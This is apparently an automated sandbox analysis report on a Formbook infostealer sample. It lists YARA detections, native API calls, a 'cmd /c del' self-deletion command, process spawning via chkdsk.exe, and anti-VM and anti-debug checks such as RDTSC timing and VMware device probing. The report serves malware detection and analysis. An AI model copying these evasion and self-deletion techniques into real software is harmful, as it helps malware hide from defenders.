          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A05A NtClose,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041A10B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00419FDA NtReadFile,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459560 NtWriteFile,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459760 NtOpenProcess,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A770 NtOpenThread,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0145A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A10 NtQuerySection,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014596D0 NtCreateKey,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01459A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E147
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D27D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E3B6
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E74D
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1D55
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141F900
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2D07
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01410D20
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E25DD
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142D5E0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01442581
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DD466
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014D1002
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142841F
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E28EC
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0142B090
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014420A0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E20A8
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2B28
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DDBD2
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E1FF1
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144EBB0
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01436E30
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E2EF7
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E22AE
          Source: C:\Users\user\Desktop\74852.exeCode function: String function: 0141B150 appears 35 times
          Source: C:\Users\user\Desktop\74852.exeCode function: String function: 00237C6A appears 60 times
          Source: 74852.exe, 00000000.00000003.241665351.000000001C90F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe
          Source: 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 74852.exe
          Source: 74852.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.286508911.0000000001360000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.244620276.0000000002FA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.286361146.0000000001330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.74852.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.74852.exe.2fa0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.74852.exe.2fa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.74852.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@10/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_01
          Source: 74852.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\74852.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 74852.exeReversingLabs: Detection: 43%
          Source: C:\Users\user\Desktop\74852.exeFile read: C:\Users\user\Desktop\74852.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\74852.exeProcess created: C:\Users\user\Desktop\74852.exe 'C:\Users\user\Desktop\74852.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\74852.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: 74852.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 74852.exe, 00000000.00000003.239671965.000000001C660000.00000004.00000001.sdmp, 74852.exe, 00000001.00000002.287145563.000000000150F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 74852.exe
          Source: 74852.exeStatic PE information: real checksum: 0x192ce should be: 0x3b2c0
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_00237C90 push eax; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00237C90 push eax; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00408138 push edi; retf
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041D22A push BBECAF91h; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416A3E push cs; retf
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416AD6 push eax; iretd
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416AB0 pushad ; retf
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00417B60 push cs; iretd
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00403658 push FFFFFFA6h; iretd
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00416674 push edx; retf
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041E6A3 push esi; retf
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0041DF21 push es; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_004167A7 push edi; ret
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0146D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\74852.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\74852.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 00000000010098E4 second address: 00000000010098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000001009B5E second address: 0000000001009B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 6880Thread sleep count: 55 > 30
          Source: C:\Windows\explorer.exe TID: 6880Thread sleep time: -110000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.268007114.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S##
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.255880997.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.270582672.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.268504207.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.261751329.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.259692429.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\74852.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\74852.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_00237790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F885 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F925 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115F8C2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 0_2_0115FA6D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_00237790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01453D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01493540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01437D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0143C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01419100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01434120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0141AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_014E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0144513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_0149A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\74852.exeCode function: 1_2_01444D3B mov eax, dword ptr fs:[00000030h]
